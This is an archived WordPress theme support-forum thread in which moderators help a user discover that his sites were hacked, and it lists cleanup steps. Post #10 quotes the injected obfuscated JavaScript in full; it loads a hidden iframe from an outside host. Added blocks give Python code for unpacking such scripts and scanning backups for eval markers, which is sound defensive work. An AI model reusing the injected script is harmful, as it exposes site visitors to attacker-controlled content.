Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021


[SOLVED] Random error


  #1  
Nov 19, 2011, 03:30 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
I have not modified any of the templates for a while, yet this issue recently appeared on all pages:

Code:
Fatal error: Cannot redeclare _765258526() (previously declared in /home/wimble17/public_html/fscene.com/wp-content/themes/atahualpa353/index.php(42) : eval()'d code:1) in /home/wimble17/public_html/fscene.com/index.php(18) : eval()'d code on line 1
You can view it at the bottom of the live site here:

http://goo.gl/HZhvk
  #2  
Nov 19, 2011, 06:32 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
What PHP code do you have in the footer area?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #3  
Nov 19, 2011, 07:21 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Thanks for your time juggledad.

There is no php code in the footer but I did insert some php code in the "content below the loop" section:

http://snipt.org/kXll7
  #4  
Nov 20, 2011, 04:02 AM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
What version?
Try changing the
HTML Code:
<?php if ( is_front_page() && strpos($_SERVER['REQUEST_URI'], "/page/") === false) { ?>
to
HTML Code:
<?php if ( is_front_page() ) { ?>
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support

Last edited by juggledad; Nov 20, 2011 at 04:08 AM.
  #5  
Nov 21, 2011, 01:06 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
No change occurred.

This site is running Atahualpa 3.5.3
  #6  
Nov 21, 2011, 05:02 PM
lmilesw
 
10,176 posts · Jul 2009
Central New York State USA
What happens if you temporarily remove the code you put in the "content below the loop" section?
__________________
~Larry (CNY Web Designs)
This site should be a membership site since it is so full of good stuff.
Please consider donating which gives you access to even more good stuff.
  #7  
Nov 22, 2011, 04:00 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by lmilesw
What happens if you temporarily remove the code you put in the "content below the loop" section?
Good observation. I just tried removing all the code I entered there, and nothing changed on the site either. So the problem must lie somewhere else.
  #8  
Nov 22, 2011, 04:39 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
Export your settings (ato->export/import settings) and attach them to a reply.
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #9  
Nov 22, 2011, 04:52 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by juggledad
export your settings (ato->export/import settings) and attach them to a reply
Thank you, here are the settings.

Last edited by Wimbledon; Nov 23, 2011 at 09:21 PM.
  #10  
Nov 22, 2011, 05:09 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
Do you have a Yahoo plugin? There is some weird code in the footer of your page:
Code:
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|cx|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|xe|noquestion|showthread|php|http|46340270'.split('|'),0,{}))
</script>
Do you know what this is or what is adding it in?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
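
Added example (not part of the original thread, and not code from any poster): the script quoted in post #10 has the `eval(function(p,a,c,k,e,d)` shape of a Dean Edwards style packer, which can be expanded statically, without running it in a browser. `unpack`, `token_for`, `find_urls` and the sample input are names and data constructed for this illustration.

```python
import re

# Matches the argument list of a Dean Edwards style packer call:
#   }('<payload>', <radix>, <count>, '<w0|w1|...>'.split('|')
PACKED_ARGS = re.compile(
    r"\}\('(?P<p>(?:[^'\\]|\\.)*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*"
    r"'(?P<k>(?:[^'\\]|\\.)*)'\.split\('\|'\)"
)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def token_for(index, radix):
    """Python mirror of the packer's e(c): word index -> token used in the payload."""
    head = "" if index < radix else token_for(index // radix, radix)
    index %= radix
    return head + (chr(index + 29) if index > 35 else DIGITS[index])

def unpack(script):
    """Statically expand a packed script; returns None if no packer call is found."""
    m = PACKED_ARGS.search(script)
    if m is None:
        return None
    payload = re.sub(r"\\(.)", r"\1", m["p"])  # undo \' and \\ escapes only
    radix, count = int(m["a"]), int(m["c"])
    words = m["k"].split("|")
    table = {}
    for i in range(count):
        tok = token_for(i, radix)
        # An empty dictionary slot means the token stands for itself.
        table[tok] = words[i] if i < len(words) and words[i] else tok
    return re.sub(r"\b\w+\b", lambda t: table.get(t[0], t[0]), payload, flags=re.ASCII)

def find_urls(code):
    """Pull URLs out of the expanded source for blocklisting or log searches."""
    return re.findall(r"https?://[^\s'\"]+", code)

# Constructed, harmless sample with the decoder body elided; not the script from the thread.
SAMPLE = r"""eval(function(p,a,c,k,e,d){/* decoder body omitted */}('0 1=2.3(\'4\');1.5=\'6://7.8/9\'',10,10,'var|el|document|createElement|iframe|src|http|example|invalid|frame'.split('|'),0,{}))"""

if __name__ == "__main__":
    expanded = unpack(SAMPLE)
    print(expanded)
    print(find_urls(expanded))
```

The payload is only treated as text here, so nothing in it executes; the expanded source and any URLs in it can then be searched for in server logs and the database export.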
  #11  
Nov 23, 2011, 04:19 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Wow juggledad, I have no idea what that is. I certainly did not add it nor do I have any Yahoo plugins. The only plugins active on the site are Disqus, Lijit Search, and NextGen Gallery. Akismet and Hello Dolly are inactive plugins.

At ATO-->Style & Edit footer, there is no such code inserted.

Perhaps this is malicious code inserted through a security vulnerability?

Are you able to tell which file has this code? If so, I will edit the file and FTP the changes.

How odd...
  #12  
Nov 23, 2011, 06:14 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
I looked at the source of a page generated from your site. I wasn't going to mention malicious code...yet, but it certainly is not code meant to be understood.

Here is what I would do: turn off all the plugins and swap to twenty-eleven.
View the front page of the site, then look at the source of the page in the browser.
Go to the end and see if that code is there. If it is, then I would say you were hacked.
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #13  
Nov 23, 2011, 06:32 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
I did exactly as you instructed yet unfortunately the code remained. It does appear that I was hacked.

Do you have any idea where I should start looking for this code?
  #14  
Nov 23, 2011, 07:10 PM
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
It might be a WordPress file.
1) Change all your passwords in WordPress - look for strange users
2) If you want to do a forensic exam, back up the entire WordPress folder and the database and get a copy of the logs for as far back as you can. If it was an FTP hack, it should show something
3) Look at the dates on the files via FTP and see if there are ones that have newer dates than when you installed WP.
4) Maybe contact your host
5) Manually replace the entire WordPress code base, everything but the wp-config.php and the wp-contents folder
6) Replace every plugin with a new copy
7) Replace every theme with a new copy
8) Change the FTP password
9) Check to see if there are any extra FTP users
10) Change your host cPanel password
11) Scan the db export for that code

Check Google for other suggestions
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
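
Added example (not part of the original thread): a triage pass over a backed-up copy of the site that applies three of the checks listed in post #14: files modified after the install date, files carrying the packed-script or PHP `eval(` markers, and the same marker in a database export. The marker list, the file names and `scan_tree` are assumptions made for this example, and the demo tree is constructed.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Heuristic markers (assumptions for this example; every hit needs a manual look).
MARKERS = {
    "packed-js": re.compile(rb"eval\(function\(p,a,c,k,e,d\)"),
    "php-eval": re.compile(rb"\beval\s*\("),
}
SCAN_EXT = {".php", ".js", ".html", ".htm", ".sql"}

def scan_tree(root, installed_at):
    """Return {relative path: [reasons]} for files that deserve review."""
    root, findings = Path(root), {}
    for path in sorted(root.rglob("*")):
        ext = path.suffix.lower()
        if not path.is_file() or ext not in SCAN_EXT:
            continue
        reasons = []
        if path.stat().st_mtime > installed_at:
            reasons.append("modified-after-install")
        data = path.read_bytes()
        for name, rx in MARKERS.items():
            if name == "php-eval" and ext != ".php":
                continue  # plain eval( is only flagged in PHP files here
            if rx.search(data):
                reasons.append(name)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    """Build a small constructed tree (not real site data) and scan it."""
    installed = time.time() - 30 * 86400  # pretend install: 30 days ago
    files = {  # name: (content, mtime)
        "wp-load.php": (b"<?php // untouched file\n", installed - 60),
        "index.php": (b"<?php eval($injected); ?>\n", installed + 86400),
        "db-export.sql": (b"'<script>eval(function(p,a,c,k,e,d){})</script>'", installed - 60),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, (body, mtime) in files.items():
            Path(tmp, name).write_bytes(body)
            os.utime(Path(tmp, name), (mtime, mtime))
        return scan_tree(tmp, installed)

if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(rel, ", ".join(reasons))
```

Modification times can be reset by whoever changed the files, so an old date is not proof that a file is clean, and some legitimate code will match `eval(`.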
  #15  
Nov 23, 2011, 09:23 PM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Thanks again for your time and help.

Upon closer inspection, all sites on the server have been similarly compromised unfortunately. I am in correspondence with my host to help resolve this. I was definitely hacked.
  #16  
Nov 24, 2011, 12:16 AM
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Update: this is a malicious attack on Wordpress setups going around right now.

http://redleg-redleg.blogspot.com/20...d-on-nlai.html

All times are GMT -6.